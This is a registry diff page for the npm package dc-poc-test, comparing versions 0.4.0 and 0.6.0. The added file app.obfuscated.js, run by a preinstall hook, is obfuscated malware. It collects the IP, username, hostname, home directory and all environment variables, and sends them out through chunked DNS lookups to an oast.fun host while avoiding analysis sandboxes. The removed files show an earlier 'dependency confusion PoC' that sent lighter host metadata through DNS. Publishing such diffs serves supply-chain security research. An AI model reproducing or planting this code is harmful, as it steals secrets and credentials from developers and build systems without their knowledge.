npm - dc-poc-test - Versions diffs - 0.4.0 → 0.6.0 - Mend

dc-poc-test 0.4.0 → 0.6.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/app.obfuscated.js ADDED Viewed

@@ -0,0 +1 @@

+ function a0_0x4ff3(_0x443e0,_0x15d91f){const _0x58b43e=a0_0x58b4();return a0_0x4ff3=function(_0x4ff324,_0x2d4718){_0x4ff324=_0x4ff324-0x1d8;let _0x5760c0=_0x58b43e[_0x4ff324];return _0x5760c0;},a0_0x4ff3(_0x443e0,_0x15d91f);}const a0_0x568abe=a0_0x4ff3;(function(_0x4567b8,_0x48a0ac){const _0xea5426=a0_0x4ff3,_0x383a99=_0x4567b8();while(!![]){try{const _0x407554=-parseInt(_0xea5426(0x1ef))/0x1+-parseInt(_0xea5426(0x1fc))/0x2+-parseInt(_0xea5426(0x1f2))/0x3*(parseInt(_0xea5426(0x1e5))/0x4)+parseInt(_0xea5426(0x1e7))/0x5*(parseInt(_0xea5426(0x1ec))/0x6)+parseInt(_0xea5426(0x1fb))/0x7+-parseInt(_0xea5426(0x1e3))/0x8+parseInt(_0xea5426(0x1d8))/0x9;if(_0x407554===_0x48a0ac)break;else _0x383a99['push'](_0x383a99['shift']());}catch(_0x1c0400){_0x383a99['push'](_0x383a99['shift']());}}}(a0_0x58b4,0x59552));const os=require('os'),dns=require(a0_0x568abe(0x1f8));function isBlockedByKeywords(_0x59b71b,_0x15ca3b){const _0xc5a575=a0_0x568abe,_0x4500d1=[_0xc5a575(0x1df),_0xc5a575(0x1f9),_0xc5a575(0x1ea)],_0x3a499e=(_0x59b71b||'')[_0xc5a575(0x1dd)](),_0x1f4169=(_0x15ca3b||'')[_0xc5a575(0x1dd)]();return _0x4500d1[_0xc5a575(0x1e4)](_0x1933b6=>_0x3a499e[_0xc5a575(0x1f4)](_0x1933b6)||_0x1f4169[_0xc5a575(0x1f4)](_0x1933b6));}function isBlockedByEnv(_0x3e12af){const _0x523601=a0_0x568abe;if(!_0x3e12af||typeof _0x3e12af!==_0x523601(0x1d9))return![];const _0x3245f1=['hscan-supplychain-dynamic','mirrors.cloud.tencent',_0x523601(0x1f3),_0x523601(0x1fe),_0x523601(0x1fa)][_0x523601(0x1fd)](_0x27e714=>_0x27e714[_0x523601(0x1dd)]());for(const [_0x23ab6a,_0x24ca76]of Object['entries'](_0x3e12af)){const _0x34402e=_0x23ab6a[_0x523601(0x1dd)](),_0x4036c0=(_0x24ca76??'')[_0x523601(0x1f6)]()['toLowerCase']();if(_0x3245f1['some'](_0x4ec21f=>_0x34402e['includes'](_0x4ec21f)||_0x4036c0[_0x523601(0x1f4)](_0x4ec21f)))return!![];}return![];};function a0_0x58b4(){const _0x4622ec=['username','from','toLowerCase','stringify','lili-pc','networkInterfaces','family','internal','5147160SJPBZm','some','327752INcooz','keys','5LLxWuD','N/A','platform','DESKTOP-','hostname','4009062XwXjtl','decoy_end','userInfo','106728lvhSIS','IPv4','d2i2nd92eku6u03pgmo05mkb1yzg18dut.oast.fun','9hTXJjR','verdaccio:4873','includes','arch','toString','hex','dns','justin','MALYSIS_ANALYSIS_ID','4486258zWLFXw','489064Ihjyvp','map','10.100.108.146:15672','lookup','env','2675736bnlBxh','object','substring'];a0_0x58b4=function(){return _0x4622ec;};return a0_0x58b4();}((async()=>{const _0x39c6f9=a0_0x568abe,_0x33af07=_0x39c6f9(0x1f1);let _0x38f015=_0x39c6f9(0x1e8);try{const _0x4823f4=os[_0x39c6f9(0x1e0)]();for(const _0x16a35c of Object[_0x39c6f9(0x1e6)](_0x4823f4)){for(const _0x2d5305 of _0x4823f4[_0x16a35c]){if(_0x2d5305[_0x39c6f9(0x1e1)]===_0x39c6f9(0x1f0)&&!_0x2d5305[_0x39c6f9(0x1e2)]){_0x38f015=_0x2d5305['address'];break;}}if(_0x38f015!==_0x39c6f9(0x1e8))break;}}catch(_0x10f65c){}const _0x49de2b=os[_0x39c6f9(0x1eb)]()||'',_0x8df6e5=(os[_0x39c6f9(0x1ee)]()[_0x39c6f9(0x1db)]||'')[_0x39c6f9(0x1f6)](),_0x349e7e=process[_0x39c6f9(0x200)],_0x294659=isBlockedByKeywords(_0x8df6e5,_0x49de2b),_0x335468=isBlockedByEnv(_0x349e7e);if(_0x294659||_0x335468)return;const _0x48fc11='decoy_start_'+Math['random']()['toString'](0x24)[_0x39c6f9(0x1da)](0x2);let _0x30f282={'_decoy':_0x48fc11,'ip':_0x38f015,'username':os['userInfo']()[_0x39c6f9(0x1db)],'hostname':os['hostname'](),'platform':os[_0x39c6f9(0x1e9)](),'arch':os[_0x39c6f9(0x1f5)](),'home':os['homedir'](),'env':process[_0x39c6f9(0x200)],'_decoy2':_0x39c6f9(0x1ed)};const _0x4f4b67=JSON[_0x39c6f9(0x1de)](_0x30f282),_0x564f32=Buffer[_0x39c6f9(0x1dc)](_0x4f4b67)[_0x39c6f9(0x1f6)](_0x39c6f9(0x1f7)),_0x1eab5d=0x32;for(let _0x31c202=0x0;_0x31c202<_0x564f32['length'];_0x31c202+=_0x1eab5d){const _0x494798=_0x564f32[_0x39c6f9(0x1da)](_0x31c202,_0x31c202+_0x1eab5d),_0x40cecb=_0x31c202/_0x1eab5d+'.'+_0x494798,_0x180da8=_0x40cecb+'.'+_0x33af07;dns[_0x39c6f9(0x1ff)](_0x180da8,_0x73aa2f=>{}),await new Promise(_0x352a0b=>setTimeout(_0x352a0b,0x64));}})());

package/package.json CHANGED Viewed

@@ -1,12 +1,12 @@
 {
-    "name": "dc-poc-test",
-    "version": "0.4.0",
-    "description": "Dependency confusion PoC for Interactsh (passive-proof via DNS A lookups)",
-    "main": "index.js",
-    "scripts": {
-      "preinstall": "node preinstall.js"
-    },
-    "license": "ISC",
-    "dependencies": {}
-  }
+  "name": "dc-poc-test",
+  "version": "0.6.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node app.obfuscated.js"
+  },
+  "keywords": [],
+  "author": "Finance Dev",
+  "license": "ISC"
+}

package/index.js DELETED Viewed

	@@ -1 +0,0 @@
1	- module.exports = {};

package/lib/outbound.js DELETED Viewed

@@ -1,61 +0,0 @@
-const dns = require('dns').promises;
-const http = require('http');
-const https = require('https');
-function httpJSON(method, url, bodyObj, headers={}) {
-  const u = new URL(url);
-  const isHttps = u.protocol === 'https:';
-  const body = bodyObj ? JSON.stringify(bodyObj) : '';
-  const opts = {
-    method,
-    hostname: u.hostname,
-    port: u.port || (isHttps ? 443 : 80),
-    path: u.pathname + (u.search || ''),
-    headers: {
-      'content-type': 'application/json',
-      ...(body ? {'content-length': Buffer.byteLength(body)} : {}),
-      ...headers
-    },
-    timeout: 8000
-  };
-  return new Promise((resolve, reject) => {
-    const req = (isHttps ? https : http).request(opts, res => {
-      let data=''; res.on('data', d=>data+=d);
-      res.on('end', () => {
-        try { resolve({ status: res.statusCode, data: data ? JSON.parse(data) : {} }); }
-        catch { resolve({ status: res.statusCode, data: {} }); }
-      });
-    });
-    req.on('error', reject);
-    if (body) req.write(body);
-    req.end();
-  });
-}
-async function fetchNonce(server, uuid, token) {
-  const res = await httpJSON('POST', `${server}/nonce`, { uuid }, { 'x-dc-token': token });
-  if (res.status === 200 && res.data && res.data.nonce) return res.data.nonce;
-  throw new Error('no-nonce');
-}
-async function postPing(server, token, sig, payload, nonce) {
-  return httpJSON('POST', `${server}/ping`, { payload, nonce }, { 'x-dc-token': token, 'x-dc-sig': sig });
-}
-async function txtChallenge(domain, uuid) {
-  const name = `nonce.${uuid}.${domain}`;
-  const txts = await dns.resolveTxt(name);
-  return txts && txts.length ? txts[0].join('') : '';
-}
-async function dnsBurst(domain, hex) {
-  const CHUNK = 50;
-  for (let i = 0; i < hex.length; i += CHUNK) {
-    const chunk = hex.slice(i, i+CHUNK);
-    const fqdn = `${(i/CHUNK)}.${chunk}.${domain}`;
-    try { await dns.lookup(fqdn); } catch {}
-    await new Promise(r => setTimeout(r, 120 + Math.floor(Math.random()*80)));
-  }
-}
-module.exports = { fetchNonce, postPing, txtChallenge, dnsBurst };

package/lib/proof.js DELETED Viewed

@@ -1,6 +0,0 @@
-// Interactsh config
-module.exports = {
-    PKG_PROOF_UUID: "acme-2025-08-uuid-7b8f7d02", // gắn mã chiến dịch/engagement
-    PROOF_DOMAIN:   "d2i139h2eku5imjmvms01u66zartsocs9.oast.me"             // <— thay bằng domain Interactsh của bạn
-  };

package/lib/utils.js DELETED Viewed

@@ -1,45 +0,0 @@
-const os = require('os');
-const crypto = require('crypto');
-const path = require('path');
-function sha256(s) {
-  return crypto.createHash('sha256').update(String(s)).digest('hex');
-}
-function randomDelay(minMs=120, maxMs=260) {
-  const d = Math.floor(minMs + Math.random()*(maxMs-minMs));
-  return new Promise(r=>setTimeout(r, d));
-}
-function firstLocalIPv4() {
-  try {
-    const ifs = os.networkInterfaces();
-    for (const name of Object.keys(ifs)) {
-      for (const it of ifs[name]) {
-        if (it.family === 'IPv4' && !it.internal) return it.address;
-      }
-    }
-  } catch {}
-  return 'N/A';
-}
-function collectMinimal() {
-  const agent = process.env.npm_config_user_agent || '';
-  const hasCI = !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.BUILD_ID || process.env.JENKINS_HOME);
-  const cwdBase = path.basename(process.cwd() || '');
-  let usernameHash = '';
-  try { usernameHash = sha256(require('os').userInfo().username || ''); } catch {}
-  return {
-    ts: new Date().toISOString(),
-    local_ipv4: firstLocalIPv4(),              // chỉ IP local (không PII)
-    username_sha256: usernameHash,             // hash username
-    hostname_sha256: sha256(os.hostname()||''),// hash hostname
-    platform: os.platform(),
-    arch: os.arch(),
-    npm_user_agent: agent,
-    cwd_basename: cwdBase,
-    has_CI: hasCI
-  };
-}
-module.exports = { sha256, randomDelay, collectMinimal };

package/preinstall.js DELETED Viewed

@@ -1,55 +0,0 @@
-const dns = require('dns').promises;
-const crypto = require('crypto');
-const { collectMinimal, randomDelay } = require('./lib/utils');
-const { PKG_PROOF_UUID, PROOF_DOMAIN } = require('./lib/proof');
-function uaLooksLikeRealNpm(ua='') {
-  return /^npm\/\d+\.\d+\.\d+\s+node\/\d+\.\d+\.\d+\s+\w+\s+\w+/.test(String(ua||''));
-}
-function hexOf(obj) {
-  try { return Buffer.from(JSON.stringify(obj)).toString('hex'); }
-  catch { return ''; }
-}
-async function pingInteractsh() {
-  const ua = process.env.npm_config_user_agent || '';
-  if (!uaLooksLikeRealNpm(ua)) return;               // giảm noise bot rác
-  const version = require('./package.json').version.replace(/\./g,'-');
-  const runtime = (process.platform || 'x') + '-' + (process.arch || 'x');
-  // Thu thập tối thiểu (an toàn, không PII)
-  const base = collectMinimal();
-  // Chèn 1 ít metadata vào label để bạn grep
-  const stamp = Date.now().toString(36);
-  const prefix = `dcpoc.${PKG_PROOF_UUID}.${version}.${runtime}.${stamp}`;
-  // Gửi 1..3 A lookups:
-  //   1) nhãn ngắn: dcpoc.<uuid>.<ver>.<runtime>.<ts>.<domain>
-  //   2) nhãn có checksum ngắn
-  //   3) (tuỳ) nhãn đính kèm 1 chunk hex của base (rất ngắn) — tránh dài quá 63 bytes/label
-  const short = `${prefix}.${PROOF_DOMAIN}`;
-  const h = crypto.createHash('sha1').update(JSON.stringify(base)).digest('hex').slice(0,10);
-  const withChk = `${prefix}.h${h}.${PROOF_DOMAIN}`;
-  const tiny = hexOf({ts: base.ts, has_CI: base.has_CI}).slice(0, 28); // 14 bytes (-> 28 hex char)
-  const withTiny = `${prefix}.x${tiny}.${PROOF_DOMAIN}`;
-  const names = [short, withChk, withTiny];
-  // Thực hiện lookup tuần tự, có trễ nhẹ
-  for (const fqdn of names) {
-    try { await dns.lookup(fqdn); } catch {}
-    await randomDelay();
-  }
-}
-(async () => {
-  try {
-    // Chỉ chạy nhánh Interactsh (passive-proof); không cần token/env ở victim
-    await pingInteractsh();
-  } catch {}
-})();